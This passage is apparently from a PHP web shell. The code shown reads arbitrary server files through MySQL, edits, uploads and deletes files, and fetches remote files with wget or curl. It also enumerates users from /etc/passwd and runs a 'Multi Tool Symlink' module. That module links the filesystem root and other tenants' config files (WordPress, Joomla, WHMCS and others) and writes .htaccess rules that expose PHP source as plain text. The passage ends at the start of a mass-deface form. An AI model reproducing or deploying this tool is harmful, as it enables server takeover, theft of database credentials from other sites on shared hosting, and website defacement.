1561. mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1562. $result = mysql_query("SELECT * FROM tmp_file;");
1563. if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1564. else {
1565. for ($i=0;$i<mysql_num_fields($result);$i++) { $name = mysql_field_name($result,$i); }
1566. $f = "";
1567. while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { $f .= join ("\r\n",$row); }
1568. if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1569. else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1570. mysql_free_result($result);
1571. mysql_query("DROP TABLE tmp_file;");
1572. }
1573. }
1574. mysql_drop_db($tmpdb);
1575. }
1576. }
1577. }
1578. }
1579. echo '</td></tr>';
1580. if ($sql_sock) {
1581. $affected = @mysql_affected_rows($sql_sock);
1582. if ((!is_numeric($affected)) or ($affected < 0)) { $affected = 0; }
1583. echo "\t<tr><th colspan=2>Affected rows: $affected</th></tr>";
1584. }
1585. echo '</table></center>';
1586. }
1587. echo '</form>';
1588. }
1589. }
1590. //*--------------------------------[ batas ]--------------------------------*//
1591.  
1592.  
1593. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ini_set('output_buffering',0);
1594. @ob_start();
1595. @eval("phpinfo();");
1596. $buff = @ob_get_contents();
1597. @ob_end_clean();
1598. $awal = strpos($buff,"<body>")+6;
1599. $akhir = strpos($buff,"</body>");
1600. echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
1601. }
1602. elseif(isset($_GET['view']) && ($_GET['view'] != "")){
1603. if(is_file($_GET['view'])){
1604. if(!isset($file)) $file = magicboom($_GET['view']);
1605. if(!$win && $posix){
1606. $name=@posix_getpwuid(@fileowner($folder));
1607. $group=@posix_getgrgid(@filegroup($folder));
1608. $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
1609. }
1610. else {
1611. $owner = $user;
1612. }
1613. $filn = basename($file);
1614. echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
1615. <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
1616. <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
1617. <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
1618. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
1619. <input class=\"inputzbut\" type=\"submit\" name=\"Rename\" value=\"Rename\" />
1620. <input class=\"inputzbut\" type=\"submit\" name=\"Cancel\" value=\"Cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
1621. </form>
1622. </td></tr>
1623. <tr><td>Size</td><td>".ukuran($file)."</td></tr>
1624. <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
1625. <tr><td>Owner</td><td>".$owner."</td></tr>
1626. <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
1627. <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
1628. <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
1629. <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">Edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">Rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">Delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">Download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">GZip</a>)</td></tr>
1630. <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">Text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">Code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">Image</a></td></tr>
1631. </table>
1632. ";
1633. if(isset($_GET['type']) && ($_GET['type']=='image')){
1634. echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>";
1635. }
1636. elseif(isset($_GET['type']) && ($_GET['type']=='code')){
1637. echo "<div class=\"viewfile\">";
1638. $file = wordwrap(@file_get_contents($file),"240","\n");
1639. @highlight_string($file);
1640. echo "</div>";
1641. }
1642. else {
1643. echo "<div class=\"viewfile\">";
1644. echo nl2br(htmlentities((@file_get_contents($file))));
1645. echo "</div>";
1646. }
1647. }
1648. elseif(is_dir($_GET['view'])){
1649. echo showdir($pwd,$prompt);
1650. }
1651.  
1652. }
1653. elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){@ini_set('output_buffering',0);
1654.  
1655. if(isset($_POST['save'])){
1656. $file = $_POST['saveas'];
1657. $content = magicboom($_POST['content']);
1658. if($filez = @fopen($file,"w")){
1659. $time = date("d-M-Y H:i",time());
1660. if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
1661. else $msg = "failed to save";
1662. @fclose($filez);
1663. }
1664. else $msg = "permission denied";
1665. }
1666. if(!isset($file)) $file = $_GET['edit'];
1667. if($filez = @fopen($file,"r")){
1668. $content = "";
1669. while(!feof($filez)){
1670. $content .= htmlentities(str_replace("''","'",fgets($filez)));
1671. }
1672. @fclose($filez);
1673. }
1674.  
1675. ?>
1676. <form action="?y=<?=$pwd; ?>&amp;edit=<?=$file; ?>" method="post">
1677. <table class="cmdbox">
1678. <tr><td colspan="2">
1679. <textarea class="output" name="content">
1680. <?=$content; ?>
1681. </textarea>
1682. <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?=$file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
1683. &nbsp;<?=$msg; ?></td></tr>
1684. </table>
1685. </form>
1686. <?php
1687. }
1688. elseif(isset($_GET['x']) && ($_GET['x'] == 'logout'))
1689. {
1690. ?>
1691. <form action="?y=<?=$pwd; ?>&amp;x=logout" method="post">
1692.  
1693. <?php
1694. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
1695. echo "<br /><br /><center>Byee !!!!!!</center>";
1696. }
1697.  
1698. //////////////////////////////////////////////////////////////////
1699. ///////////////////////////////////////////////////////////////////////////////
1700. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){ @ini_set('output_buffering',0);
1701. echo "
1702. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1703.  
1704. <tr>
1705. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1706. <center><b><font size=5 style=italic color=#00ff00>Uploader</font></b></center></td></tr></table>
1707. ";
1708. if(isset($_POST['uploadcomp'])){
1709. if(is_uploaded_file($_FILES['file']['tmp_name'])){
1710. $path = magicboom($_POST['path']);
1711. $fname = $_FILES['file']['name'];
1712. $tmp_name = $_FILES['file']['tmp_name'];
1713. $pindah = $path.$fname;
1714. $stat = @move_uploaded_file($tmp_name,$pindah);
1715. if ($stat) {
1716. $msg = "file uploaded to $pindah";
1717. }
1718. else $msg = "failed to upload $fname";
1719. }
1720. else $msg = "failed to upload $fname";
1721. }
1722. elseif(isset($_POST['uploadurl'])){@ini_set('output_buffering',0);
1723. $pilihan = trim($_POST['pilihan']);
1724. $wurl = trim($_POST['wurl']);
1725. $path = magicboom($_POST['path']);
1726. $namafile = download($pilihan,$wurl);
1727. $pindah = $path.$namafile;
1728. if(is_file($pindah)) {
1729. $msg = "file uploaded to $pindah";
1730. }
1731. else $msg = "failed to upload $namafile";
1732.  
1733. }
1734. ?>
1735. <form action="?y=<?=$pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post"><table class="tabnet" style="width:320px;padding:0 1px;"><tr><th colspan="2"><b>Upload From Computer</b></th></tr><tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
1736. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?=$pwd; ?>" /></td></tr>
1737. </tr></table></form><table class="tabnet" style="width:320px;padding:0 1px;"><tr><th colspan="2"><b>Upload From URL</b></th></tr><tr><td colspan="2"><form method="post" style="margin:0;padding:0;" action="?y=<?=$pwd; ?>&amp;x=upload">
1738. <table><tr><td>Url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
1739. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?=$pwd; ?>" /></td></tr>
1740. <tr><td><select size="1" class="inputz" name="pilihan"><option value="wwget">Wget</option><option value="wlynx">Lynx</option><option value="wfread">Fread</option><option value="wfetch">Fetch</option><option value="wlinks">Links</option><option value="wget">Get</option><option value="wcurl">Curl</option>
1741. </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
1742. </tr></table><div style="text-align:center;margin:2px;"><?=$msg; ?></div>
1743. <?php }
1744. ////////////////////////////////////////////////////////////////////////////////////
1745. elseif(isset($_GET['x']) && ($_GET['x'] == 'jumping')){ @ini_set('output_buffering',0);
1746. echo "
1747. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1748.  
1749. <tr>
1750. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1751. <center><b><font size=5 style=italic color=#00ff00>Jumping</font></b></center></td></tr></table>
1752. ";
1753. ?>
1754. <form action="?y=<?=$pwd; ?>&x=jumping" method="post">
1755. <?php
1756. echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
1757. ($sm = ini_get('safe_mode') == 0) ?
1758. $sm = 'off': die("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink>&nbsp;: &nbsp;&nbsp;Safe_mode = On </b></td></tr></table>");
1759.  
1760. set_time_limit(0);
1761. echo "<table class=\"cmdbox\"><tr><td colspan=\"2\">";
1762. @$passwd = fopen('/etc/passwd','r');
1763. if (!$passwd) { die ("<b><blink><font style='color:#ff0000'>[-] ERROR</font></blink>&nbsp; : &nbsp;&nbsp; I Can't Read [ /etc/passwd ]</b></td></tr></table>
1764. <br><br><br><br><center><div class=\"info\"><b></div>
1765. <br><br><div class=\"jaya\"> &copy; ".date('Y',time())." Security Ghost </b></div></center>"); }
1766. $pub = array();
1767. $users = array();
1768. $conf = array();
1769. $i = 0;
1770.  
1771. while(!feof($passwd)){
1772. $str = fgets($passwd);
1773. if ($i > 100){ $pos = strpos($str,':');
1774. $username = substr($str,0,$pos);
1775. $dirz = '/home/'.$username.'/public_html/';
1776. if (($username != '')){ if (is_readable($dirz)){ array_push($users,$username);
1777. array_push($pub,$dirz); } } } $i++; }
1778. foreach ($users as $user){
1779. echo '
1780. <table><tr><td>[Found !]</td>
1781. <td><a href="?y=/home/'.$user.'/public_html">/home/'.$user.'/public_html/</a><td></tr>'; }
1782. echo "</table>";
1783. }
1784.  
1785.  
1786. /////////////////////////////////////////////////////////////////////////////////////
1787. elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
1788. { @ini_set('output_buffering',0);
1789. echo "
1790. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
1791.  
1792. <tr>
1793. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
1794. <center><b><font size=5 style=italic color=#00ff00>Multi Tool Symlink</font></b></center></td></tr></table>
1795. ";
1796. ?>
1797. <form action="?y=<?=$pwd; ?>&amp;x=symlink" method="post">
1798. <form method='post'><center><table class='tabnet'><tr><th colspan='5'><b>Multi Tool Symlink</b></th></tr><tr><th><b>Manual Symlink</b></th><th><b>Auto Symlink</b></th><th><b>Domain Viewer</b></th></tr><tr><td><input class='inputzbut' type='submit'name='symlinkr' value="Manual Symlink" /></td><td><input class='inputzbut' type='submit'name='symlinks' value="Auto Symlink" /></td><td><input class='inputzbut' type='submit' name='domain' value="Domain Viewer" /></td></tr></table></center></form><br><hr><br><br>
1799. <?php
1800.  
1801. #==================[ Multi Tool Symlink ]==================#
1802.  
1803. if(isset($_POST['domain']))
1804. {
1805. ?>
1806. <form action="?y=<?=$pwd; ?>&x=dv" method="post">
1807. <center><h2>[ Domain Viewer by ]<br>Notes: If Blank(No Domain) That Mean Not Work Use Domain Viewer, You Can Use Auto Symlink Server</center><br><br>
1808. <?php
1809. function openBaseDir()
1810. {
1811. $openBaseDir = ini_get("open_basedir");
1812. if (!$openBaseDir)
1813. {
1814. $openBaseDir = '<font color="green">OFF</font>';
1815. }
1816. else
1817. {
1818. $openBaseDir = '<font color="red">ON</font>';
1819. }
1820. return $openBaseDir;
1821. }
1822.  
1823.  
1824. echo '
1825. <table width="95%" cellspacing="0" cellpadding="0" class="td1" >
1826. <td height="100" align="left" class="td1">';
1827. $pg = basename(__FILE__);
1828. $safe_mode = @ini_get('safe_mode');
1829. $dir = @getcwd();
1830. ////////////////////////////////////////////////////
1831. // LET'S PLAY ~
1832. ##.htaccess
1833. @mkdir('explodedsym',0777);
1834. @symlink("/","explodedsym/root");
1835. $htaccss = "Options all
1836. DirectoryIndex Sux.html
1837. AddType text/plain .php
1838. AddHandler server-parsed .php
1839. AddType text/plain .html
1840. AddHandler txt .html
1841. Require None
1842. Satisfy Any";
1843.  
1844. file_put_contents("explodedsym/.htaccess",$htaccss);
1845. $etc = file_get_contents("/etc/passwd");
1846. $etcz = explode("\n",$etc);
1847.  
1848.  
1849. ##Symlink to the ROOT :p
1850. foreach($etcz as $etz){
1851. $etcc = explode(":",$etz);
1852. error_reporting(0);
1853.  
1854. $current_dir = posix_getcwd();
1855. $dir = explode("/",$current_dir);
1856.  
1857. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1858. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1859. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1860. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"explodedsym/".$etcc[0].'-WordPress.txt');
1861. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"explodedsym/".$etcc[0].'-PhpBB.txt');
1862. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"explodedsym/".$etcc[0].'-vBulletin.txt');
1863. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1864. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1865. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1866. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"explodedsym/".$etcc[0].'-Joomla.txt');
1867. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"explodedsym/".$etcc[0].'-IPB.txt');
1868. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"explodedsym/".$etcc[0].'-MyBB.txt');
1869. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"explodedsym/".$etcc[0].'-SMF.txt');
1870. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"explodedsym/".$etcc[0].'-Drupal.txt');
1871. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"explodedsym/".$etcc[0].'-e107.txt');
1872. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"explodedsym/".$etcc[0].'-Seditio.txt');
1873. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"explodedsym/".$etcc[0].'-osCommerce.txt');
1874. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1875. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1876. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1877. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1878. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1879. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1880. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1881. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1882. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1883. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1884. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1885. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1886. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"explodedsym/".$etcc[0].'-WHMCS.txt');
1887. }
1888. #############################
1889. if(is_readable("/var/named")){
1890. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1891. echo'<tr><td><center><b>SITE</b></center></td><td>
1892. <center><b>USER</b></center></td>
1893. <td></center><b>SYMLINK</b></center></td>';
1894. $list = scandir("/var/named");
1895. foreach($list as $domain){
1896. if(strpos($domain,".db")){
1897. $i += 1;
1898. $domain = str_replace('.db','',$domain);
1899. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1900.  
1901. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1902. <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
1903. <td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1904. }
1905. }
1906. echo "<center>Total Domains Found: ".$i."</center><br />";
1907. }else{
1908. echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
1909.  
1910. break;
1911.  
1912. ##################################
1913. error_reporting(0);
1914. $etc = file_get_contents("/etc/passwd");
1915. $etcz = explode("\n",$etc);
1916. if(is_readable("/etc/passwd")){
1917.  
1918. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1919. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
1920.  
1921. $list = scandir("/var/named");
1922.  
1923. foreach($etcz as $etz){
1924. $etcc = explode(":",$etz);
1925.  
1926. foreach($list as $domain){
1927. if(strpos($domain,".db")){
1928. $domain = str_replace('.db','',$domain);
1929. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1930. if($owner['name'] == $etcc[0])
1931. {
1932. $i += 1;
1933. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
1934. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1935. <td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1936. }}}}
1937. echo "<center>Total Domains Found: ".$i."</center><br />";}
1938.  
1939. break;
1940. ###############################
1941. if(is_readable("/etc/named.conf")){
1942. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1943. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
1944. $named = file_get_contents("/etc/named.conf");
1945. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
1946. foreach($domains[1] as $domain){
1947. $domain = trim($domain);
1948. $i += 1;
1949. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1950. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1951. }
1952. echo "<center>Total Domains Found: ".$i."</center><br />";
1953.  
1954. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
1955.  
1956. break;
1957. ############################
1958. if(is_readable("/etc/valiases")){
1959. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
1960. echo'<tr><td><center><b>SITE</b></center></td><td>
1961. <center><b>USER</b></center></td><td></center>
1962. <b>SYMLINK</b></center></td>';
1963. $list = scandir("/etc/valiases");
1964. foreach($list as $domain){
1965. $i += 1;
1966. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
1967. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
1968. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
1969. <td class='td1'><center><a href='explodedsym/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
1970. }
1971. echo "<center>Total Domains Found: ".$i."</center><br />";
1972. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
1973.  
1974. break;
1975. }
1976.  
1977. ##################################
1978.  
1979. #==================[ Multi Tool Symlink ]==================#
1980.  
1981. if(isset($_POST['symlinkr']))
1982. {
1983. @set_time_limit(0);
1984. @mkdir('sym',0777);
1985. error_reporting(0);
1986. $htaccess = "Options all \n DirectoryIndex gaza.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1987. $op =@fopen ('sym/.htaccess','w');
1988. fwrite($op ,$htaccess);
1989. echo '<center><b>[ Manual Symlink ]</b><br><br>
1990. <form method="post"><table class="tabnet"><th colspan="5">Manual Symlink</th><tr>
1991. <td>File Path &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:</td><td><input class="inputz" type="text" name="file" value="/home/user/public_html/config.php" size="60"/></td></tr>
1992. <tr><td>Symlink Name :</td><td><input class="inputz" type="text" name="symfile" value="config.txt" size="60"/></td></tr>
1993. <tr><td></td><td><input class="inputzbut" type="submit" value="Symlink" name="symlink" /></td></tr></table></form></center>';
1994. $target = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink'];
1995. if ($symlink) {@symlink("$target","sym/$symfile");
1996. echo '<br><center><a target="_blank" href="sym/'.$symfile.'" >'.$symfile.'</a><center>';}}
1997.  
1998. #==================[ Multi Tool Symlink ]==================#
1999.  
2000. if(isset($_POST['symlinks']))
2001. {
2002. @set_time_limit(0);
2003. echo "<center><h1>[ Auto Symlink Server]</h1></center><br><center><div class=content>";
2004. $d0mains = @file("/etc/named.conf");
2005. ##httaces
2006. if($d0mains){
2007. @mkdir("explodedsyms",0777);
2008. @chdir("explodedsyms");
2009. @exe("ln -s / root");
2010. $file3 = 'Options all
2011. DirectoryIndex Sux.html
2012. AddType text/plain .php
2013. AddHandler server-parsed .php
2014. AddType text/plain .html
2015. AddHandler txt .html
2016. Require None
2017. Satisfy Any';
2018. $fp3 = fopen('.htaccess','w');
2019. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2020. echo "
2021. <table align=center border=1 style='width:60%;border-color:#333333;'>
2022. <tr>
2023. <td align=center><font size=3>S. No.</font></td>
2024. <td align=center><font size=3>Domains</font></td>
2025. <td align=center><font size=3>Users</font></td>
2026. <td align=center><font size=3>Symlink</font></td>
2027. </tr>";
2028. $dcount = 1;
2029.  
2030. foreach($d0mains as $d0main){
2031. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
2032. flush();
2033. if(strlen(trim($domains[1][0])) > 2){
2034. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2035. echo "<tr align=center><td><font size=3>" . $dcount . "</font></td>
2036. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
2037. <td>".$user['name']."</td>
2038. <td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
2039. flush();
2040. $dcount++;}}}
2041. echo "</table>";
2042. }else{
2043. $TEST=@file('/etc/passwd');
2044. if ($TEST){
2045. @mkdir("explodedsyms",0777);
2046. @chdir("explodedsyms");
2047. exe("ln -s / root");
2048. $file3 = 'Options all
2049. DirectoryIndex Sux.html
2050. AddType text/plain .php
2051. AddHandler server-parsed .php
2052. AddType text/plain .html
2053. AddHandler txt .html
2054. Require None
2055. Satisfy Any';
2056. $fp3 = fopen('.htaccess','w');
2057. $fw3 = fwrite($fp3,$file3);
2058. @fclose($fp3);
2059. echo "<br><br><center><h2>Symlink Server !</h2></center><br><br>
2060. <table align=center border=1><tr>
2061. <td align=center><font size=4>S. No.</font></td>
2062. <td align=center><font size=4>Users</font></td>
2063. <td align=center><font size=4>Symlink</font></td></tr>";
2064. $dcount = 1;
2065. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
2066. while(!feof($file)){
2067. $s = fgets($file);
2068. $matches = array();
2069. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2070. $matches = str_replace("home/","",$matches[1]);
2071. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2072. continue;
2073. echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2074. <td align=center><font class=txt>" . $matches . "</td>";
2075. echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2076. $dcount++;}fclose($file);
2077. echo "</table>";}else{if($os != "Windows"){@mkdir("explodedsyms",0777);@chdir("explodedsyms");@exe("ln -s / root");$file3 = 'Options all
2078. DirectoryIndex Sux.html
2079. AddType text/plain .php
2080. AddHandler server-parsed .php
2081. AddType text/plain .html
2082. AddHandler txt .html
2083. Require None
2084. Satisfy Any';
2085. $fp3 = fopen('.htaccess','w');
2086. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
2087. echo "<center>
2088. <table align=center border=1><tr>
2089. <td align=center><font size=4>Id</font></td>
2090. <td align=center><font size=4>Users</font></td>
2091. <td align=center><font size=4>Symlink</font></td></tr>";
2092. $temp = "";$val1 = 0;$val2 = 1000;
2093. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
2094. if ($uid)$temp .= join(':',$uid)."\n";}
2095. echo '<br/>';$temp = trim($temp);$file5 =
2096. fopen("test.txt","w");
2097. fputs($file5,$temp);
2098. fclose($file5);$dcount = 1;$file =
2099. fopen("test.txt", "r") or exit("Unable to open file!");
2100. while(!feof($file)){$s = fgets($file);$matches = array();
2101. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
2102. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
2103. continue;
2104. echo "<tr><td align=center><font size=3>" . $dcount . "</td>
2105. <td align=center><font class=txt>" . $matches . "</td>";
2106. echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
2107. $dcount++;}
2108. fclose($file);
2109. echo "</table></div></center>";unlink("test.txt");
2110. } else
2111. echo "<center><font size=4>Cannot create Symlink</font></center>";
2112. }
2113. }
2114. }
2115. }
2116. /////////////////////////////////////////////////////////////////
2117. /////////////////////////////////////////////////////////////////////////////////////////////
2118.  
2119.  
2120. elseif(isset($_GET['x']) && ($_GET['x'] == 'mass'))
2121. {
2122. echo "
2123. <table style=width:100%; border=0 class=tabnet cellpadding=3 cellspacing=1 align=center>
2124.  
2125. <tr>
2126. <td valign=top bgcolor=#151515 class=style2 style=width: 139px>
2127. <center><b><font size=5 style=italic color=#00ff00>Mass Deface</font></b></center></td></tr></table>
2128. ";
2129. error_reporting(0);?>
2130. <form ENCTYPE="multipart/form-data" action="<?php $_SERVER['PHP_SELF']?>" method='post'>
2131. <td><table><table class="tabnet" >
2132.  
2133. <th colspan='5'><b>Folder Mass Deface</b></th>
2134. <form hethot='post'>
2135. <tr>
2136. <tr>
2137. <td>&nbsp;&nbsp;Folder</td><td><input class ='inputz' style='background:black;' type='text' name='path' size='60' value="<?=getcwd();?>"></td>
2138. </tr><br>
2139. <tr>
